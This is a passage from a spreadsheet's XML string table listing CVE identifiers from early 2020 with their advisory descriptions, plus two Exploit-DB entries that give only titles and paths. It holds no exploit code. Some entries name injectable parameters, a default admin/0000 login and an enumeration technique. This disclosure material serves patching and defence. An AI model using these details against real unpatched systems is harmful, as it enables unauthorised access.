    <t>Mids' Reborn Hero Designer 2.6.0.7 downloads the update manifest, as well as update files, over cleartext HTTP. Additionally, the application does not perform file integrity validation for files after download. An attacker can perform a man-in-the-middle attack against this connection and replace executable files with malicious versions, which the operating system then executes under the context of the user running Hero Designer.</t>
  </si>
  <si>
    <t>CVE-2020-11615</t>
  </si>
  <si>
    <t>NVIDIA DGX servers, all BMC firmware versions prior to 3.38.30, contain a vulnerability in the AMI BMC firmware in which it uses a hard-coded RC4 cipher key, which may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-11616</t>
  </si>
  <si>
    <t>NVIDIA DGX servers, all BMC firmware versions prior to 3.38.30, contain a vulnerability in the AMI BMC firmware in which the Pseudo-Random Number Generator (PRNG) algorithm used in the JSOL package that implements the IPMI protocol is not cryptographically strong, which may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-11617</t>
  </si>
  <si>
    <t>The RSS application on THOMSON THT741FTA 2.2.1 and Philips DTR3502BFTA DVB-T2 2.2.1 set-top boxes doesn't validate the SSL certificates of RSS servers, which allows a man-in-the-middle attacker to modify the data delivered to the client.</t>
  </si>
  <si>
    <t>CVE-2020-11618</t>
  </si>
  <si>
    <t>THOMSON THT741FTA 2.2.1 and Philips DTR3502BFTA DVB-T2 2.2.1 set-top boxes have their TELNET service hardcoded to start on boot, which allows an attacker on the local network to achieve root access via the TELNET protocol.</t>
  </si>
  <si>
    <t>CVE-2020-11619</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop).</t>
  </si>
  <si>
    <t>CVE-2020-1162</t>
  </si>
  <si>
    <t>An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory.To exploit the vulnerability, an attacker would first have to log on to the system, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1324.</t>
  </si>
  <si>
    <t>CVE-2020-11620</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly).</t>
  </si>
  <si>
    <t>CVE-2020-11622</t>
  </si>
  <si>
    <t>A vulnerability exists in Arista’s Cloud EOS VM / vEOS 4.23.2M and below releases in the 4.23.x train, 4.22.4M and below releases in the 4.22.x train, 4.21.3M to 4.21.9M releases in the 4.21.x train, 4.21.3FX-7368.*, 4.21.4-FCRFX.*, 4.21.4.1, 4.21.7.1, 4.22.2.0.1, 4.22.2.2.1, 4.22.3.1, and 4.23.2.1 Router code in a scenario where TCP MSS options are configured.</t>
  </si>
  <si>
    <t>CVE-2020-11623</t>
  </si>
  <si>
    <t>An issue was discovered in AvertX Auto focus Night Vision HD Indoor/Outdoor IP Dome Camera HD838 and Night Vision HD Indoor/Outdoor Mini IP Bullet Camera HD438. An attacker with physical access to the UART interface could access additional diagnostic and configuration functionalities as well as the camera's bootloader. Successful exploitation could compromise confidentiality, integrity, and availability of the affected system. It could even render the device inoperable.</t>
  </si>
  <si>
    <t>CVE-2020-11624</t>
  </si>
  <si>
    <t>An issue was discovered in AvertX Auto focus Night Vision HD Indoor/Outdoor IP Dome Camera HD838 and Night Vision HD Indoor/Outdoor Mini IP Bullet Camera HD438. They do not require users to change the default password for the admin account. They only show a pop-up window suggesting a change but there's no enforcement. An administrator can click Cancel and proceed to use the device without changing the password. Additionally, they disclose the default username within the login.js script. Since many attacks for IoT devices, including malware and exploits, are based on the usage of default credentials, it makes these cameras an easy target for malicious actors.</t>
  </si>
  <si>
    <t>CVE-2020-11625</t>
  </si>
  <si>
    <t>An issue was discovered in AvertX Auto focus Night Vision HD Indoor/Outdoor IP Dome Camera HD838 and Night Vision HD Indoor/Outdoor Mini IP Bullet Camera HD438. Failed web UI login attempts elicit different responses depending on whether a user account exists. Because the responses indicate whether a submitted username is valid or not, they make it easier to identify legitimate usernames. If a login request is sent to ISAPI/Security/sessionLogin/capabilities using a username that exists, it will return the value of the salt given to that username, even if the password is incorrect. However, if a login request is sent using a username that is not present in the database, it will return an empty salt value. This allows attackers to enumerate legitimate usernames, facilitating brute-force attacks. NOTE: this is different from CVE-2020-7057.</t>
  </si>
  <si>
    <t>CVE-2020-11626</t>
  </si>
  <si>
    <t>An issue was discovered in EJBCA before 6.15.2.6 and 7.x before 7.3.1.2. Two Cross Side Scripting (XSS) vulnerabilities have been found in the Public Web and the Certificate/CRL download servlets.</t>
  </si>
  <si>
    <t>CVE-2020-11627</t>
  </si>
  <si>
    <t>An issue was discovered in EJBCA before 6.15.2.6 and 7.x before 7.3.1.2. A Cross Site Request Forgery (CSRF) issue has been found in the CA UI.</t>
  </si>
  <si>
    <t>CVE-2020-11628</t>
  </si>
  <si>
    <t>An issue was discovered in EJBCA before 6.15.2.6 and 7.x before 7.3.1.2. It is intended to support restriction of available remote protocols (CMP, ACME, REST, etc.) through the system configuration. These restrictions can be bypassed by modifying the URI string from a client. (EJBCA's internal access control restrictions are still in place, and each respective protocol must be configured to allow for enrollment.)</t>
  </si>
  <si>
    <t>CVE-2020-11629</t>
  </si>
  <si>
    <t>An issue was discovered in EJBCA before 6.15.2.6 and 7.x before 7.3.1.2. The External Command Certificate Validator, which allows administrators to upload external linters to validate certificates, is supposed to save uploaded test certificates to the server. An attacker who has gained access to the CA UI could exploit this to upload malicious scripts to the server. (Risks associated with this issue alone are negligible unless a malicious user already has gained access to the CA UI through other means, as a trusted user is already trusted to upload scripts by virtue of having access to the validator.)</t>
  </si>
  <si>
    <t>CVE-2020-1163</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Defender that leads arbitrary file deletion on the system.To exploit the vulnerability, an attacker would first have to log on to the system, aka 'Microsoft Windows Defender Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1170.</t>
  </si>
  <si>
    <t>CVE-2020-11630</t>
  </si>
  <si>
    <t>An issue was discovered in EJBCA before 6.15.2.6 and 7.x before 7.3.1.2. In several sections of code, the verification of serialized objects sent between nodes (connected via the Peers protocol) allows insecure objects to be deserialized.</t>
  </si>
  <si>
    <t>CVE-2020-11631</t>
  </si>
  <si>
    <t>An issue was discovered in EJBCA before 6.15.2.6 and 7.x before 7.3.1.2. An error state can be generated in the CA UI by a malicious user. This, in turn, allows exploitation of other bugs. This follow-on exploitation can lead to privilege escalation and remote code execution. (This is exploitable only when at least one accessible port lacks a requirement for client certificate authentication. These ports are 8442 or 8080 in a standard installation.)</t>
  </si>
  <si>
    <t>CVE-2020-11632</t>
  </si>
  <si>
    <t>The Zscaler Client Connector prior to 2.1.2.150 did not quote the search path for services, which allows a local adversary to execute code with system privileges.</t>
  </si>
  <si>
    <t>CVE-2020-11633</t>
  </si>
  <si>
    <t>The Zscaler Client Connector for Windows prior to 2.1.2.74 had a stack based buffer overflow when connecting to misconfigured TLS servers. An adversary would potentially have been able to execute arbitrary code with system privileges.</t>
  </si>
  <si>
    <t>CVE-2020-11634</t>
  </si>
  <si>
    <t>The Zscaler Client Connector for Windows prior to 2.1.2.105 had a DLL hijacking vulnerability caused due to the configuration of OpenSSL. A local adversary may be able to execute arbitrary code in the SYSTEM context.</t>
  </si>
  <si>
    <t>CVE-2020-11635</t>
  </si>
  <si>
    <t>The Zscaler Client Connector prior to 3.1.0 did not sufficiently validate RPC clients, which allows a local adversary to execute code with system privileges or perform limited actions for which they did not have privileges.</t>
  </si>
  <si>
    <t>CVE-2020-11637</t>
  </si>
  <si>
    <t>A memory leak in the TFTP service in B&amp;R Automation Runtime versions &lt;N4.26, &lt;N4.34, &lt;F4.45, &lt;E4.53, &lt;D4.63, &lt;A4.73 and prior could allow an unauthenticated attacker with network access to cause a denial of service (DoS) condition.</t>
  </si>
  <si>
    <t>CVE-2020-1164</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158.</t>
  </si>
  <si>
    <t>CVE-2020-11641</t>
  </si>
  <si>
    <t>A local file inclusion vulnerability in B&amp;R SiteManager versions &lt;9.2.620236042 allows authenticated users to read sensitive files from SiteManager instances.</t>
  </si>
  <si>
    <t>CVE-2020-11642</t>
  </si>
  <si>
    <t>The local file inclusion vulnerability present in B&amp;R SiteManager versions &lt;9.2.620236042 allows authenticated users to impact availability of SiteManager instances.</t>
  </si>
  <si>
    <t>CVE-2020-11643</t>
  </si>
  <si>
    <t>An information disclosure vulnerability in B&amp;R GateManager 4260 and 9250 versions &lt;9.0.20262 and GateManager 8250 versions &lt;9.2.620236042 allows authenticated users to view information of devices belonging to foreign domains.</t>
  </si>
  <si>
    <t>CVE-2020-11644</t>
  </si>
  <si>
    <t>The information disclosure vulnerability present in B&amp;R GateManager 4260 and 9250 versions &lt;9.0.20262 and GateManager 8250 versions &lt;9.2.620236042 allows authenticated users to generate fake audit log messages.</t>
  </si>
  <si>
    <t>CVE-2020-11645</t>
  </si>
  <si>
    <t>A denial of service vulnerability in B&amp;R GateManager 4260 and 9250 versions &lt;9.0.20262 and GateManager 8250 versions &lt;9.2.620236042 allows authenticated users to limit availability of GateManager instances.</t>
  </si>
  <si>
    <t>CVE-2020-11646</t>
  </si>
  <si>
    <t>A log information disclosure vulnerability in B&amp;R GateManager 4260 and 9250 versions &lt;9.0.20262 and GateManager 8250 versions &lt;9.2.620236042 allows authenticated users to view log information reserved for other users.</t>
  </si>
  <si>
    <t>CVE-2020-11647</t>
  </si>
  <si>
    <t>In Wireshark 3.2.0 to 3.2.2, 3.0.0 to 3.0.9, and 2.6.0 to 2.6.15, the BACapp dissector could crash. This was addressed in epan/dissectors/packet-bacapp.c by limiting the amount of recursion.</t>
  </si>
  <si>
    <t>CVE-2020-11649</t>
  </si>
  <si>
    <t>An issue was discovered in GitLab CE and EE 8.15 through 12.9.2. Members of a group could still have access after the group is deleted.</t>
  </si>
  <si>
    <t>CVE-2020-1165</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows improperly handles calls to Clipboard Service, aka 'Windows Clipboard Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1111, CVE-2020-1121, CVE-2020-1166.</t>
  </si>
  <si>
    <t>exploits/multiple/remote/48421.txt</t>
  </si>
  <si>
    <t>Saltstack 3000.1 - Remote Code Execution</t>
  </si>
  <si>
    <t>2020-05-05</t>
  </si>
  <si>
    <t>CVE-2020-11650</t>
  </si>
  <si>
    <t>An issue was discovered in iXsystems FreeNAS (and TrueNAS) 11.2 before 11.2-u8 and 11.3 before 11.3-U1. It allows a denial of service. The login authentication component has no limits on the length of an authentication message or the rate at which such messages are sent.</t>
  </si>
  <si>
    <t>CVE-2020-11651</t>
  </si>
  <si>
    <t>An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.</t>
  </si>
  <si>
    <t>CVE-2020-11652</t>
  </si>
  <si>
    <t>An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.</t>
  </si>
  <si>
    <t>CVE-2020-11653</t>
  </si>
  <si>
    <t>An issue was discovered in Varnish Cache before 6.0.6 LTS, 6.1.x and 6.2.x before 6.2.3, and 6.3.x before 6.3.2. It occurs when communication with a TLS termination proxy uses PROXY version 2. There can be an assertion failure and daemon restart, which causes a performance loss.</t>
  </si>
  <si>
    <t>CVE-2020-11655</t>
  </si>
  <si>
    <t>SQLite through 3.31.1 allows attackers to cause a denial of service (segmentation fault) via a malformed window-function query because the AggInfo object's initialization is mishandled.</t>
  </si>
  <si>
    <t>CVE-2020-11656</t>
  </si>
  <si>
    <t>In SQLite through 3.31.1, the ALTER TABLE implementation has a use-after-free, as demonstrated by an ORDER BY clause that belongs to a compound SELECT statement.</t>
  </si>
  <si>
    <t>CVE-2020-11658</t>
  </si>
  <si>
    <t>CA API Developer Portal 4.3.1 and earlier handles shared secret keys in an insecure manner, which allows attackers to bypass authorization.</t>
  </si>
  <si>
    <t>CVE-2020-11659</t>
  </si>
  <si>
    <t>CA API Developer Portal 4.3.1 and earlier contains an access control flaw that allows privileged users to perform a restricted user administration action.</t>
  </si>
  <si>
    <t>CVE-2020-1166</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows improperly handles calls to Clipboard Service, aka 'Windows Clipboard Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1111, CVE-2020-1121, CVE-2020-1165.</t>
  </si>
  <si>
    <t>CVE-2020-11660</t>
  </si>
  <si>
    <t>CA API Developer Portal 4.3.1 and earlier contains an access control flaw that allows privileged users to view restricted sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-11661</t>
  </si>
  <si>
    <t>CA API Developer Portal 4.3.1 and earlier contains an access control flaw that allows privileged users to view and edit user data.</t>
  </si>
  <si>
    <t>CVE-2020-11662</t>
  </si>
  <si>
    <t>CA API Developer Portal 4.3.1 and earlier handles requests insecurely, which allows remote attackers to exploit a Cross-Origin Resource Sharing flaw and access sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-11663</t>
  </si>
  <si>
    <t>CA API Developer Portal 4.3.1 and earlier handles 404 requests in an insecure manner, which allows attackers to perform open redirect attacks.</t>
  </si>
  <si>
    <t>CVE-2020-11664</t>
  </si>
  <si>
    <t>CA API Developer Portal 4.3.1 and earlier handles homeRedirect page redirects in an insecure manner, which allows attackers to perform open redirect attacks.</t>
  </si>
  <si>
    <t>CVE-2020-11665</t>
  </si>
  <si>
    <t>CA API Developer Portal 4.3.1 and earlier handles loginRedirect page redirects in an insecure manner, which allows attackers to perform open redirect attacks.</t>
  </si>
  <si>
    <t>CVE-2020-11666</t>
  </si>
  <si>
    <t>CA API Developer Portal 4.3.1 and earlier contains an access control flaw that allows malicious users to elevate privileges.</t>
  </si>
  <si>
    <t>CVE-2020-11668</t>
  </si>
  <si>
    <t>In the Linux kernel before 5.6.1, drivers/media/usb/gspca/xirlink_cit.c (aka the Xirlink camera USB driver) mishandles invalid descriptors, aka CID-a246b4d54770.</t>
  </si>
  <si>
    <t>CVE-2020-11669</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.2 on the powerpc platform. arch/powerpc/kernel/idle_book3s.S does not have save/restore functionality for PNV_POWERSAVE_AMR, PNV_POWERSAVE_UAMOR, and PNV_POWERSAVE_AMOR, aka CID-53a712bae5dd.</t>
  </si>
  <si>
    <t>CVE-2020-1167</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka 'Microsoft Graphics Components Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16923.</t>
  </si>
  <si>
    <t>CVE-2020-11671</t>
  </si>
  <si>
    <t>Lack of authorization controls in REST API functions in TeamPass through 2.1.27.36 allows any TeamPass user with a valid API token to become a TeamPass administrator and read/modify all passwords via authenticated api/index.php REST API calls. NOTE: the API is not available by default.</t>
  </si>
  <si>
    <t>CVE-2020-11673</t>
  </si>
  <si>
    <t>An issue was discovered in the Responsive Poll through 1.3.4 for Wordpress. It allows an unauthenticated user to manipulate polls, e.g., delete, clone, or view a hidden poll. This is due to the usage of the callback wp_ajax_nopriv function in Includes/Total-Soft-Poll-Ajax.php for sensitive operations.</t>
  </si>
  <si>
    <t>CVE-2020-11674</t>
  </si>
  <si>
    <t>Cerner medico 26.00 allows variable reuse, possibly causing data corruption.</t>
  </si>
  <si>
    <t>CVE-2020-11675</t>
  </si>
  <si>
    <t>Cerner medico 26.00 has a Local Buffer Overflow (issue 1 of 3).</t>
  </si>
  <si>
    <t>CVE-2020-11676</t>
  </si>
  <si>
    <t>Cerner medico 26.00 has a Local Buffer Overflow (issue 2 of 3).</t>
  </si>
  <si>
    <t>CVE-2020-11677</t>
  </si>
  <si>
    <t>Cerner medico 26.00 has a Local Buffer Overflow (issue 3 of 3).</t>
  </si>
  <si>
    <t>CVE-2020-11679</t>
  </si>
  <si>
    <t>Castel NextGen DVR v1.0.0 is vulnerable to privilege escalation through the Adminstrator/Users/Edit/:UserId functionality. Adminstrator/Users/Edit/:UserId fails to check that the request was submitted by an Administrator. This allows a normal user to escalate their privileges by adding additional roles to their account.</t>
  </si>
  <si>
    <t>CVE-2020-11680</t>
  </si>
  <si>
    <t>Castel NextGen DVR v1.0.0 is vulnerable to authorization bypass on all administrator functionality. The application fails to check that a request was submitted by an administrator. Consequently, a normal user can perform actions including, but not limited to, creating/modifying the file store, creating/modifying alerts, creating/modifying users, etc.</t>
  </si>
  <si>
    <t>CVE-2020-11681</t>
  </si>
  <si>
    <t>Castel NextGen DVR v1.0.0 stores and displays credentials for the associated SMTP server in cleartext. Low privileged users can exploit this to create an administrator user and obtain the SMTP credentials.</t>
  </si>
  <si>
    <t>CVE-2020-11682</t>
  </si>
  <si>
    <t>Castel NextGen DVR v1.0.0 is vulnerable to CSRF in all state-changing request. A __RequestVerificationToken is set by the web interface, and included in requests sent by web interface. However, this token is not verified by the application: the token can be removed from all requests and the request will succeed.</t>
  </si>
  <si>
    <t>CVE-2020-11683</t>
  </si>
  <si>
    <t>A timing side channel was discovered in AT91bootstrap before 3.9.2. It can be exploited by attackers with physical access to forge CMAC values and subsequently boot arbitrary code on an affected system.</t>
  </si>
  <si>
    <t>CVE-2020-11684</t>
  </si>
  <si>
    <t>AT91bootstrap before 3.9.2 does not properly wipe encryption and authentication keys from memory before passing control to a less privileged software component. This can be exploited to disclose these keys and subsequently encrypt and sign the next boot stage (such as the bootloader).</t>
  </si>
  <si>
    <t>CVE-2020-11685</t>
  </si>
  <si>
    <t>In JetBrains GoLand before 2019.3.2, the plugin repository was accessed via HTTP instead of HTTPS.</t>
  </si>
  <si>
    <t>CVE-2020-11686</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2019.1.4, a project administrator was able to retrieve some TeamCity server settings.</t>
  </si>
  <si>
    <t>CVE-2020-11687</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2019.2.2, password values were shown in an unmasked format on several pages.</t>
  </si>
  <si>
    <t>CVE-2020-11688</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2019.2.1, the application state is kept alive after a user ends his session.</t>
  </si>
  <si>
    <t>CVE-2020-11689</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2019.2.1, a user without appropriate permissions was able to import settings from the settings.kts file.</t>
  </si>
  <si>
    <t>CVE-2020-1169</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1303.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48856.py</t>
  </si>
  <si>
    <t>SpamTitan 7.07 - Unauthenticated Remote Code Execution</t>
  </si>
  <si>
    <t>2020-10-05</t>
  </si>
  <si>
    <t>CVE-2020-11690</t>
  </si>
  <si>
    <t>In JetBrains IntelliJ IDEA before 2020.1, the license server could be resolved to an untrusted host in some cases.</t>
  </si>
  <si>
    <t>CVE-2020-11691</t>
  </si>
  <si>
    <t>In JetBrains Hub before 2020.1.12099, content spoofing in the Hub OAuth error message was possible.</t>
  </si>
  <si>
    <t>CVE-2020-11692</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2020.1.659, DB export was accessible to read-only administrators.</t>
  </si>
  <si>
    <t>CVE-2020-11693</t>
  </si>
  <si>
    <t>JetBrains YouTrack before 2020.1.659 was vulnerable to DoS that could be caused by attaching a malformed TIFF file to an issue.</t>
  </si>
  <si>
    <t>CVE-2020-11694</t>
  </si>
  <si>
    <t>In JetBrains PyCharm 2019.2.5 and 2019.3 on Windows, Apple Notarization Service credentials were included. This is fixed in 2019.2.6 and 2019.3.3.</t>
  </si>
  <si>
    <t>CVE-2020-11696</t>
  </si>
  <si>
    <t>In Combodo iTop a menu shortcut name can be exploited with a stored XSS payload. This is fixed in all iTop packages (community, essential, professional) in version 2.7.0 and iTop essential and iTop professional in version 2.6.4.</t>
  </si>
  <si>
    <t>CVE-2020-11697</t>
  </si>
  <si>
    <t>In Combodo iTop, dashboard ids can be exploited with a reflective XSS payload. This is fixed in all iTop packages (community, essential, professional) for version 2.7.0 and in iTop essential and iTop professional packages for version 2.6.4.</t>
  </si>
  <si>
    <t>CVE-2020-11698</t>
  </si>
  <si>
    <t>An issue was discovered in Titan SpamTitan 7.07. Improper input sanitization of the parameter community on the page snmp-x.php would allow a remote attacker to inject commands into the file snmpd.conf that would allow executing commands on the target server.</t>
  </si>
  <si>
    <t>CVE-2020-11699</t>
  </si>
  <si>
    <t>An issue was discovered in Titan SpamTitan 7.07. Improper validation of the parameter fname on the page certs-x.php would allow an attacker to execute remote code on the target server. The user has to be authenticated before interacting with this page.</t>
  </si>
  <si>
    <t>CVE-2020-1170</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Defender that leads arbitrary file deletion on the system.To exploit the vulnerability, an attacker would first have to log on to the system, aka 'Microsoft Windows Defender Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1163.</t>
  </si>
  <si>
    <t>CVE-2020-11700</t>
  </si>
  <si>
    <t>An issue was discovered in Titan SpamTitan 7.07. Improper sanitization of the parameter fname, used on the page certs-x.php, would allow an attacker to retrieve the contents of arbitrary files. The user has to be authenticated before interacting with this page.</t>
  </si>
  <si>
    <t>CVE-2020-11701</t>
  </si>
  <si>
    <t>An issue was discovered in ProVide (formerly zFTPServer) through 13.1. CSRF exists in the User Web Interface, as demonstrated by granting filesystem access to the public for uploading and deleting files and directories.</t>
  </si>
  <si>
    <t>CVE-2020-11702</t>
  </si>
  <si>
    <t>An issue was discovered in ProVide (formerly zFTPServer) through 13.1. The User Web Interface has Multiple Stored and Reflected XSS issues. Collaborate is Reflected via the filename parameter. Collaborate is Stored via the displayname parameter. Deletemultiple is Reflected via the files parameter. Share is Reflected via the target parameter. Share is Stored via the displayname parameter. Waitedit is Reflected via the Host header.</t>
  </si>
  <si>
    <t>CVE-2020-11703</t>
  </si>
  <si>
    <t>An issue was discovered in ProVide (formerly zFTPServer) through 13.1. /ajax/GetInheritedProperties allows HTTP Response Splitting via the language parameter.</t>
  </si>
  <si>
    <t>CVE-2020-11704</t>
  </si>
  <si>
    <t>An issue was discovered in ProVide (formerly zFTPServer) through 13.1. The Admin Web Interface has Multiple Stored and Reflected XSS. GetInheritedProperties is Reflected via the groups parameter. GetUserInfo is Reflected via POST data. SetUserInfo is Stored via the general parameter.</t>
  </si>
  <si>
    <t>CVE-2020-11705</t>
  </si>
  <si>
    <t>An issue was discovered in ProVide (formerly zFTPServer) through 13.1. /ajax/ImportCertificate allows an attacker to load an arbitrary certificate in .pfx format or overwrite arbitrary files via the fileName parameter.</t>
  </si>
  <si>
    <t>CVE-2020-11706</t>
  </si>
  <si>
    <t>An issue was discovered in ProVide (formerly zFTPServer) through 13.1. The Admin Interface allows CSRF for actions such as: Change any username and password, admin ones included; Create/Delete users; Enable/Disable Services; Set a rogue update proxy; and Shutdown the server.</t>
  </si>
  <si>
    <t>CVE-2020-11707</t>
  </si>
  <si>
    <t>An issue was discovered in ProVide (formerly zFTPServer) through 13.1. It doesn't enforce permission over Windows Symlinks or Junctions. As a result, a low-privileged user (non-admin) can craft a Junction Link in a directory he has full control of, breaking out of the sandbox.</t>
  </si>
  <si>
    <t>CVE-2020-11708</t>
  </si>
  <si>
    <t>An issue was discovered in ProVide (formerly zFTPServer) through 13.1. Privilege escalation can occur via the /ajax/SetUserInfo messages parameter because of the EXECUTE() feature, which is for executing programs when certain events are triggered.</t>
  </si>
  <si>
    <t>CVE-2020-11709</t>
  </si>
  <si>
    <t>cpp-httplib through 0.5.8 does not filter \r\n in parameters passed into the set_redirect and set_header functions, which creates possibilities for CRLF injection and HTTP response splitting in some specific contexts.</t>
  </si>
  <si>
    <t>CVE-2020-1171</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Visual Studio Code when the Python extension loads configuration files after opening a project, aka 'Visual Studio Code Python Extension Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1192.</t>
  </si>
  <si>
    <t>CVE-2020-11710</t>
  </si>
  <si>
    <t>** DISPUTED ** An issue was discovered in docker-kong (for Kong) through 2.0.3. The admin API port may be accessible on interfaces other than 127.0.0.1. NOTE: The vendor argue that this CVE is not a vulnerability because it has an inaccurate bug scope and patch links. “1) Inaccurate Bug Scope - The issue scope was on Kong's docker-compose template, and not Kong's docker image itself. In reality, this issue is not associated with any version of the Kong gateway. As such, the description stating ‘An issue was discovered in docker-kong (for Kong) through 2.0.3.’ is incorrect. This issue only occurs if a user decided to spin up Kong via docker-compose without following the security documentation. The docker-compose template is meant for users to quickly get started with Kong, and is meant for development purposes only. 2) Incorrect Patch Links - The CVE currently points to a documentation improvement as a “Patch” link: https://github.com/Kong/docs.konghq.com/commit/d693827c32144943a2f45abc017c1321b33ff611.This link actually points to an improvement Kong Inc made for fool-proofing. However, instructions for how to protect the admin API were already well-documented here: https://docs.konghq.com/2.0.x/secure-admin-api/#network-layer-access-restrictions , which was first published back in 2017 (as shown in this commit: https://github.com/Kong/docs.konghq.com/commit/e99cf875d875dd84fdb751079ac37882c9972949) Lastly, the hyperlink to https://github.com/Kong/kong (an unrelated Github Repo to this issue) on the Hyperlink list does not include any meaningful information on this topic.”</t>
  </si>
  <si>
    <t>CVE-2020-11712</t>
  </si>
  <si>
    <t>Open Upload through 0.4.3 allows XSS via index.php?action=u and the filename field.</t>
  </si>
  <si>
    <t>CVE-2020-11713</t>
  </si>
  <si>
    <t>wolfSSL 4.3.0 has mulmod code in wc_ecc_mulmod_ex in ecc.c that does not properly resist timing side-channel attacks.</t>
  </si>
  <si>
    <t>CVE-2020-11714</t>
  </si>
  <si>
    <t>eten PSG-6528VM 1.1 devices allow XSS via System Contact or System Location.</t>
  </si>
  <si>
    <t>CVE-2020-11715</t>
  </si>
  <si>
    <t>Panasonic P99 devices through 2020-04-10 have Incorrect Access Control. NOTE: the vendor states that all affected products are at "End-of-software-support."</t>
  </si>
  <si>
    <t>CVE-2020-11716</t>
  </si>
  <si>
    <t>Panasonic P110, Eluga Z1 Pro, Eluga X1, and Eluga X1 Pro devices through 2020-04-10 have Insecure Permissions. NOTE: the vendor states that all affected products are at "End-of-software-support."</t>
  </si>
  <si>
    <t>CVE-2020-11717</t>
  </si>
  <si>
    <t>An issue was discovered in Programi 014 31.01.2020. It has multiple SQL injection vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2020-11718</t>
  </si>
  <si>
    <t>An issue was discovered in Programi Bilanc build 007 release 014 31.01.2020 and below. Its software-update packages are downloaded via cleartext HTTP.</t>
  </si>
  <si>
    <t>CVE-2020-11719</t>
  </si>
  <si>
    <t>An issue was discovered in Programi Bilanc build 007 release 014 31.01.2020 and possibly below. It relies on broken encryption with a weak and guessable static encryption key.</t>
  </si>
  <si>
    <t>CVE-2020-1172</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1057, CVE-2020-1180.</t>
  </si>
  <si>
    <t>CVE-2020-11720</t>
  </si>
  <si>
    <t>An issue was discovered in Programi Bilanc build 007 release 014 31.01.2020 and possibly below. During the installation, it sets up administrative access by default with the account admin and password 0000. After the installation, users/admins are not prompted to change this password.</t>
  </si>
  <si>
    <t>CVE-2020-11721</t>
  </si>
  <si>
    <t>load_png in loader.c in libsixel.a in libsixel 1.8.6 has an uninitialized pointer leading to an invalid call to free, which can cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-11722</t>
  </si>
  <si>
    <t>Dungeon Crawl Stone Soup (aka DCSS or crawl) before 0.25 allows remote attackers to execute arbitrary code via Lua bytecode embedded in an uploaded .crawlrc file.</t>
  </si>
  <si>
    <t>CVE-2020-11723</t>
  </si>
  <si>
    <t>Cellebrite UFED 5.0 through 7.29 uses four hardcoded RSA private keys to authenticate to the ADB daemon on target devices. Extracted keys can be used to place evidence onto target devices when performing a forensic extraction.</t>
  </si>
  <si>
    <t>CVE-2020-11724</t>
  </si>
  <si>
    <t>An issue was discovered in OpenResty before 1.15.8.4. ngx_http_lua_subrequest.c allows HTTP request smuggling, as demonstrated by the ngx.location.capture API.</t>
  </si>
  <si>
    <t>CVE-2020-11725</t>
  </si>
  <si>
    <t>** DISPUTED ** snd_ctl_elem_add in sound/core/control.c in the Linux kernel through 5.6.3 has a count=info-&gt;owner line, which later affects a private_size*count multiplication for unspecified "interesting side effects." NOTE: kernel engineers dispute this finding, because it could be relevant only if new callers were added that were unfamiliar with the misuse of the info-&gt;owner field to represent data unrelated to the "owner" concept. The existing callers, SNDRV_CTL_IOCTL_ELEM_ADD and SNDRV_CTL_IOCTL_ELEM_REPLACE, have been designed to misuse the info-&gt;owner field in a safe way.</t>
  </si>
  <si>
    <t>CVE-2020-11727</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the AlgolPlus Advanced Order Export For WooCommerce plugin 3.1.3 for WordPress allows remote attackers to inject arbitrary web script or HTML via the view/settings-form.php woe_post_type parameter.</t>
  </si>
  <si>
    <t>CVE-2020-11728</t>
  </si>
  <si>
